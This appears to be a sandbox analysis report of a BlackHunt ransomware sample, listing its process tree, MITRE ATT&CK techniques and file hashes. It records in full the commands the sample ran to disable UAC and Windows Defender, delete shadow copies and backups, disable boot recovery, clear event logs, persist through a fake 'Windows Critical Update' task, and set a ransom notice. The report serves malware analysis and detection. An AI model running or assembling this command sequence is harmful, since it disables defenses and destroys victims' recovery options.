description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe"C:\Users\Admin\AppData\Local\Temp\c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1896 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2604
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2216
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:652
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe" /F2⤵PID:1676
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2884
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:328
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:296
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1848
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2944
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1440
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:956
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1968
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2244
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2796
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2636
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:2028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2824
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2684
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2904
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2196
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2532
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2544
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2172
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:1016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2892
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2748
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2600
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2044
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
PID:1768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1976
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
PID:2936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2876
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
PID:1748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3048
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2548
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:232
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵PID:320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe"2⤵PID:1208
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2940
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2572
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2896
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1872
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:1660
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:1976
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:556
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2360
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2528
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1284
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:2732
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1192
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1084
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2908
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe" /F1⤵
- Creates scheduled task(s)
PID:2636 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Modifies registry class
PID:2820
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:1944
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:3020
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:1588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1408
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1988
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1856
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:400
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:1964
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:1704
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:836
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1272
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:2868
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2924
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2540
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "10800800011275402316-133285718-334462041-1451539050-1638932739307936676-2008682005"1⤵PID:1856
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:1440
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1798731121082808608-1356240683596953623-769346584849876744-3108366061490970121"1⤵PID:400
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:752
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-892520943-602355781817647477-15500986106636423444247901541574039006909841836"1⤵PID:2924
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:1668
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1470389232-1918773953-1283236871733910188-11853735155055958381557974167281707320"1⤵PID:2628
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD593d1d01c15f12dd832b12d8ae3bae145
SHA147bebc365ece01b32e569c7dc23039dc7eb054bc
SHA256b22495e90805df7e96512ea01e0a91d90465f54f53b07fd536afc970c22bc1e8
SHA512be736d2baeadbfaa3e27d5dc84654a0d85fb2bbcf34c66cb178322231ddb1d84bce3b5a36a4e8a1be3c34bd340c7a31e551b6e3ac779bcd83efc7b1abec2d2b7
-
Filesize
684B
MD5257b550aa1e3fab2cf67bda131cbbd9c
SHA165a86f4a695a9c2b4d63d7d0c5f5e1527612f121
SHA256e633e2502eb7d43695c3f82110a6f822c517ddb4c2ba06ed018e511ab2cde8e9
SHA5126061c5bf90d40b2caa106a43fb6b1bf6d7d4a9554f932b9ac23765702509169cf7ff6b04c4a7c27a9dd77d5b443110f72bd7740d1cf77cb81b009fbe1c95fc61
-
Filesize
1KB
MD57b7f0a71200a143d2247b102ff8ab9c6
SHA15e86f6073f1a5ae7aedb121f102f804d7d5a8305
SHA256a0f81b2e169d6d1c187fe68038df07f10a13c2c36353b0056261ca820ab8b0ad
SHA512793293d97052ba929dbb34fb54a4c6359299c67a383b8bac8613690509451faa9b2ec71ae46afd9daecb6a345078cfea6535396378b0f8296df155600f939708